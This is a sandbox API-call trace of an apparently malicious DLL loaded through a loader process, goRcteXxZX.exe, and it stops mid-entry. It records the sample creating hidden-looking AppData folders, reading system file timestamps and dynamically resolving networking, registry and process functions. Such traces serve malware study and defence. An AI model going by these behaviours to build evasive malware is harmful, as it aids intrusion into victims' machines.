[0036.624] SetLastError (dwErrCode=0x0) [0036.624] GetLastError () returned 0x0 [0036.624] SetLastError (dwErrCode=0x0) [0036.624] GetLastError () returned 0x0 [0036.624] SetLastError (dwErrCode=0x0) [0036.624] GetLastError () returned 0x0 [0036.624] SetLastError (dwErrCode=0x0) [0036.624] GetLastError () returned 0x0 [0036.625] SetLastError (dwErrCode=0x0) [0036.625] GetLastError () returned 0x0 [0036.625] SetLastError (dwErrCode=0x0) [0036.625] GetLastError () returned 0x0 [0036.625] SetLastError (dwErrCode=0x0) [0036.625] GetLastError () returned 0x0 [0036.625] SetLastError (dwErrCode=0x0) [0036.625] GetLastError () returned 0x0 [0036.625] SetLastError (dwErrCode=0x0) [0036.625] GetLastError () returned 0x0 [0036.625] SetLastError (dwErrCode=0x0) [0036.625] GetLastError () returned 0x0 [0036.625] SetLastError (dwErrCode=0x0) [0036.625] GetLastError () returned 0x0 [0036.625] SetLastError (dwErrCode=0x0) [0036.625] GetLastError () returned 0x0 [0036.625] SetLastError (dwErrCode=0x0) [0036.625] GetLastError () returned 0x0 [0036.625] SetLastError (dwErrCode=0x0) [0036.625] GetLastError () returned 0x0 [0036.625] SetLastError (dwErrCode=0x0) [0036.625] GetLastError () returned 0x0 [0036.625] SetLastError (dwErrCode=0x0) [0036.625] GetLastError () returned 0x0 [0036.625] SetLastError (dwErrCode=0x0) [0036.625] GetLastError () returned 0x0 [0036.626] SetLastError (dwErrCode=0x0) [0036.626] GetLastError () returned 0x0 [0036.626] SetLastError (dwErrCode=0x0) [0036.626] GetLastError () returned 0x0 [0036.626] SetLastError (dwErrCode=0x0) [0036.626] GetLastError () returned 0x0 [0036.626] SetLastError (dwErrCode=0x0) [0036.626] GetLastError () returned 0x0 [0036.626] SetLastError (dwErrCode=0x0) [0036.626] GetLastError () returned 0x0 [0036.626] SetLastError (dwErrCode=0x0) [0036.626] GetLastError () returned 0x0 [0036.626] SetLastError (dwErrCode=0x0) [0036.626] GetLastError () returned 0x0 [0036.626] SetLastError (dwErrCode=0x0) [0036.626] GetLastError () returned 0x0 [0036.626] SetLastError (dwErrCode=0x0) [0036.626] GetLastError () returned 0x0 [0036.626] SetLastError (dwErrCode=0x0) [0036.626] GetLastError () returned 0x0 [0036.626] SetLastError (dwErrCode=0x0) [0036.626] GetLastError () returned 0x0 [0036.626] SetLastError (dwErrCode=0x0) [0036.626] GetLastError () returned 0x0 [0036.626] SetLastError (dwErrCode=0x0) [0036.626] GetLastError () returned 0x0 [0036.627] SetLastError (dwErrCode=0x0) [0036.627] GetLastError () returned 0x0 [0036.627] SetLastError (dwErrCode=0x0) [0036.627] GetLastError () returned 0x0 [0036.627] SetLastError (dwErrCode=0x0) [0036.627] GetLastError () returned 0x0 [0036.627] SetLastError (dwErrCode=0x0) [0036.627] GetLastError () returned 0x0 [0036.627] SetLastError (dwErrCode=0x0) [0036.627] GetLastError () returned 0x0 [0036.627] SetLastError (dwErrCode=0x0) [0036.627] GetLastError () returned 0x0 [0036.627] SetLastError (dwErrCode=0x0) [0036.627] GetLastError () returned 0x0 [0036.627] SetLastError (dwErrCode=0x0) [0036.627] GetLastError () returned 0x0 [0036.627] SetLastError (dwErrCode=0x0) [0036.627] GetLastError () returned 0x0 [0036.627] SetLastError (dwErrCode=0x0) [0036.627] GetLastError () returned 0x0 [0036.627] SetLastError (dwErrCode=0x0) [0036.627] GetLastError () returned 0x0 [0036.627] SetLastError (dwErrCode=0x0) [0036.627] GetLastError () returned 0x0 [0036.627] SetLastError (dwErrCode=0x0) [0036.627] GetLastError () returned 0x0 [0036.628] SetLastError (dwErrCode=0x0) [0036.628] GetLastError () returned 0x0 [0036.628] SetLastError (dwErrCode=0x0) [0036.628] GetLastError () returned 0x0 [0036.628] SetLastError (dwErrCode=0x0) [0036.628] GetLastError () returned 0x0 [0036.628] SetLastError (dwErrCode=0x0) [0036.628] GetLastError () returned 0x0 [0036.628] SetLastError (dwErrCode=0x0) [0036.628] GetLastError () returned 0x0 [0036.628] SetLastError (dwErrCode=0x0) [0036.628] GetLastError () returned 0x0 [0036.628] SetLastError (dwErrCode=0x0) [0036.628] GetLastError () returned 0x0 [0036.628] SetLastError (dwErrCode=0x0) [0036.628] GetLastError () returned 0x0 [0036.628] SetLastError (dwErrCode=0x0) [0036.628] GetLastError () returned 0x0 [0036.628] SetLastError (dwErrCode=0x0) [0036.629] GetLastError () returned 0x0 [0036.629] SetLastError (dwErrCode=0x0) [0036.629] GetLastError () returned 0x0 [0036.629] SetLastError (dwErrCode=0x0) [0036.629] GetLastError () returned 0x0 [0036.629] SetLastError (dwErrCode=0x0) [0036.629] GetLastError () returned 0x0 [0036.629] SetLastError (dwErrCode=0x0) [0036.629] GetLastError () returned 0x0 [0036.629] SetLastError (dwErrCode=0x0) [0036.629] GetLastError () returned 0x0 [0036.629] SetLastError (dwErrCode=0x0) [0036.629] GetLastError () returned 0x0 [0036.629] SetLastError (dwErrCode=0x0) [0036.629] GetLastError () returned 0x0 [0036.629] SetLastError (dwErrCode=0x0) [0036.629] GetLastError () returned 0x0 [0036.629] SetLastError (dwErrCode=0x0) [0036.629] GetLastError () returned 0x0 [0036.629] SetLastError (dwErrCode=0x0) [0036.629] GetLastError () returned 0x0 [0036.629] SetLastError (dwErrCode=0x0) [0036.629] GetLastError () returned 0x0 [0036.629] SetLastError (dwErrCode=0x0) [0036.629] GetLastError () returned 0x0 [0036.630] SetLastError (dwErrCode=0x0) [0036.630] GetLastError () returned 0x0 [0036.630] SetLastError (dwErrCode=0x0) [0036.630] GetLastError () returned 0x0 [0036.630] SetLastError (dwErrCode=0x0) [0036.630] GetLastError () returned 0x0 [0036.630] SetLastError (dwErrCode=0x0) [0036.630] GetLastError () returned 0x0 [0036.630] SetLastError (dwErrCode=0x0) [0036.630] GetLastError () returned 0x0 [0036.630] SetLastError (dwErrCode=0x0) [0036.630] GetLastError () returned 0x0 [0036.630] SetLastError (dwErrCode=0x0) [0036.630] GetLastError () returned 0x0 [0036.630] SetLastError (dwErrCode=0x0) [0036.630] GetLastError () returned 0x0 [0036.630] SetLastError (dwErrCode=0x0) [0036.630] GetLastError () returned 0x0 [0036.630] SetLastError (dwErrCode=0x0) [0036.630] GetLastError () returned 0x0 [0036.630] SetLastError (dwErrCode=0x0) [0036.630] GetLastError () returned 0x0 [0036.630] SetLastError (dwErrCode=0x0) [0036.630] GetLastError () returned 0x0 [0036.630] SetLastError (dwErrCode=0x0) [0036.630] GetLastError () returned 0x0 [0036.631] SetLastError (dwErrCode=0x0) [0036.631] GetLastError () returned 0x0 [0036.631] SetLastError (dwErrCode=0x0) [0036.631] GetLastError () returned 0x0 [0036.631] SetLastError (dwErrCode=0x0) [0036.631] GetLastError () returned 0x0 [0036.631] SetLastError (dwErrCode=0x0) [0036.631] GetLastError () returned 0x0 [0036.631] SetLastError (dwErrCode=0x0) [0036.631] GetLastError () returned 0x0 [0036.631] SetLastError (dwErrCode=0x0) [0036.631] GetLastError () returned 0x0 [0036.631] SetLastError (dwErrCode=0x0) [0036.631] GetLastError () returned 0x0 [0036.631] SetLastError (dwErrCode=0x0) [0036.631] GetLastError () returned 0x0 [0036.631] SetLastError (dwErrCode=0x0) [0036.631] GetLastError () returned 0x0 [0036.631] SetLastError (dwErrCode=0x0) [0036.631] GetLastError () returned 0x0 [0036.631] SetLastError (dwErrCode=0x0) [0036.631] GetLastError () returned 0x0 [0036.631] SetLastError (dwErrCode=0x0) [0036.631] GetLastError () returned 0x0 [0036.631] SetLastError (dwErrCode=0x0) [0036.631] GetLastError () returned 0x0 [0036.632] SetLastError (dwErrCode=0x0) [0036.632] GetLastError () returned 0x0 [0036.632] SetLastError (dwErrCode=0x0) [0036.632] GetLastError () returned 0x0 [0036.632] SetLastError (dwErrCode=0x0) [0036.632] GetLastError () returned 0x0 [0036.632] SetLastError (dwErrCode=0x0) [0036.632] GetLastError () returned 0x0 [0036.632] SetLastError (dwErrCode=0x0) [0036.632] GetLastError () returned 0x0 [0036.632] SetLastError (dwErrCode=0x0) [0036.632] GetLastError () returned 0x0 [0036.632] SetLastError (dwErrCode=0x0) [0036.632] GetLastError () returned 0x0 [0036.632] SetLastError (dwErrCode=0x0) [0036.632] GetLastError () returned 0x0 [0036.632] SetLastError (dwErrCode=0x0) [0036.632] GetLastError () returned 0x0 [0036.632] SetLastError (dwErrCode=0x0) [0036.632] GetLastError () returned 0x0 [0036.632] SetLastError (dwErrCode=0x0) [0036.632] GetLastError () returned 0x0 [0036.632] SetLastError (dwErrCode=0x0) [0036.632] GetLastError () returned 0x0 [0036.632] SetLastError (dwErrCode=0x0) [0036.632] GetLastError () returned 0x0 [0036.632] SetLastError (dwErrCode=0x0) [0036.633] GetLastError () returned 0x0 [0036.633] SetLastError (dwErrCode=0x0) [0036.633] GetLastError () returned 0x0 [0036.633] SetLastError (dwErrCode=0x0) [0036.633] GetLastError () returned 0x0 [0036.633] SetLastError (dwErrCode=0x0) [0036.633] GetLastError () returned 0x0 [0036.633] SetLastError (dwErrCode=0x0) [0036.633] GetLastError () returned 0x0 [0036.633] SetLastError (dwErrCode=0x0) [0036.633] GetLastError () returned 0x0 [0036.633] SetLastError (dwErrCode=0x0) [0036.633] GetLastError () returned 0x0 [0036.633] SetLastError (dwErrCode=0x0) [0036.633] GetLastError () returned 0x0 [0036.633] SetLastError (dwErrCode=0x0) [0036.633] GetLastError () returned 0x0 [0036.633] SetLastError (dwErrCode=0x0) [0036.633] GetLastError () returned 0x0 [0036.633] SetLastError (dwErrCode=0x0) [0036.633] GetLastError () returned 0x0 [0036.633] SetLastError (dwErrCode=0x0) [0036.633] GetLastError () returned 0x0 [0036.633] SetLastError (dwErrCode=0x0) [0036.633] GetLastError () returned 0x0 [0036.633] SetLastError (dwErrCode=0x0) [0036.633] GetLastError () returned 0x0 [0036.634] SetLastError (dwErrCode=0x0) [0036.634] GetLastError () returned 0x0 [0036.634] SetLastError (dwErrCode=0x0) [0036.634] GetLastError () returned 0x0 [0036.634] SetLastError (dwErrCode=0x0) [0036.634] GetLastError () returned 0x0 [0036.634] SetLastError (dwErrCode=0x0) [0036.634] GetLastError () returned 0x0 [0036.634] SetLastError (dwErrCode=0x0) [0036.634] GetLastError () returned 0x0 [0036.634] SetLastError (dwErrCode=0x0) [0036.634] GetLastError () returned 0x0 [0036.634] SetLastError (dwErrCode=0x0) [0036.634] GetLastError () returned 0x0 [0036.634] SetLastError (dwErrCode=0x0) [0036.634] GetLastError () returned 0x0 [0036.634] SetLastError (dwErrCode=0x0) [0036.634] GetLastError () returned 0x0 [0036.634] SetLastError (dwErrCode=0x0) [0036.634] GetLastError () returned 0x0 [0036.634] SetLastError (dwErrCode=0x0) [0036.634] GetLastError () returned 0x0 [0036.634] SetLastError (dwErrCode=0x0) [0036.634] GetLastError () returned 0x0 [0036.634] SetLastError (dwErrCode=0x0) [0036.635] GetLastError () returned 0x0 [0036.635] SetLastError (dwErrCode=0x0) [0036.635] GetLastError () returned 0x0 [0036.635] SetLastError (dwErrCode=0x0) [0036.635] GetLastError () returned 0x0 [0036.635] SetLastError (dwErrCode=0x0) [0036.635] GetLastError () returned 0x0 [0036.635] SetLastError (dwErrCode=0x0) [0036.635] GetLastError () returned 0x0 [0036.635] SetLastError (dwErrCode=0x0) [0036.635] GetLastError () returned 0x0 [0036.635] SetLastError (dwErrCode=0x0) [0036.635] GetLastError () returned 0x0 [0036.635] SetLastError (dwErrCode=0x0) [0036.635] GetLastError () returned 0x0 [0036.635] SetLastError (dwErrCode=0x0) [0036.635] GetLastError () returned 0x0 [0036.635] SetLastError (dwErrCode=0x0) [0036.635] GetLastError () returned 0x0 [0036.635] SetLastError (dwErrCode=0x0) [0036.636] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0036.636] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0036.636] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0036.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f588 | out: lpSystemTimeAsFileTime=0x26f588*(dwLowDateTime=0xe385a4f0, dwHighDateTime=0x1d3dfba)) [0036.637] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f4c0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.637] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f3a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.637] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetLastError () returned 0x0 [0036.638] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0036.638] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0036.638] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.638] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.638] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.638] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0036.638] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0036.638] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0036.639] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0036.639] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0036.639] GetLastError () returned 0xb7 [0036.639] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0036.639] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0036.639] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0036.639] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0036.639] wsprintfA (in: param_1=0x26f228, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0036.639] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0036.639] wsprintfA (in: param_1=0x26f124, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0036.639] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.639] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0036.639] CloseHandle (hObject=0x74) returned 1 [0036.639] GetLastError () returned 0x0 [0036.639] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0036.640] GetLastError () returned 0x0 [0036.640] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0036.640] GetSystemDirectoryA (in: lpBuffer=0x26f228, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0036.640] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.640] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0036.640] CloseHandle (hObject=0x74) returned 1 [0036.640] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0036.640] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0036.640] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0036.642] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0036.642] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0036.642] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0036.642] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0036.642] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0036.643] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0036.643] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0036.643] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0036.643] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0036.643] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0036.643] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0036.643] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0036.643] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0036.643] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0036.643] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0036.643] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0036.643] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0036.644] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0036.644] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0036.644] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0036.644] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0036.644] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0036.644] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0036.644] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0036.644] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0036.644] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0036.644] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0036.644] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0036.644] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0036.645] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0036.645] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0036.645] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0036.645] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0036.645] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0036.645] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0036.645] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0036.645] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0036.645] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0036.645] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0036.645] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0036.645] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0036.645] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0036.645] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0036.645] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0036.645] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0036.646] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0036.646] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0036.646] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0036.646] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0036.646] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0036.646] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0036.646] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0036.646] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0036.646] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0036.646] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0036.646] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0036.646] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0036.646] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0036.646] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0036.646] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0036.646] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0036.647] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.647] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.647] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.647] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0036.648] HeapDestroy (hHeap=0x160000) returned 1 Process: id = "69" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f380" os_pid = "0xe8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject /fn_args=\"%Temp%\\IXP000.TMP\\\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3025 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3026 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3027 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3028 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3029 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 3030 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3031 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3032 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3033 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 3034 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 3035 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3036 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3037 start_va = 0x4a0000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 3038 start_va = 0x760000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 3039 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3040 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3041 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: 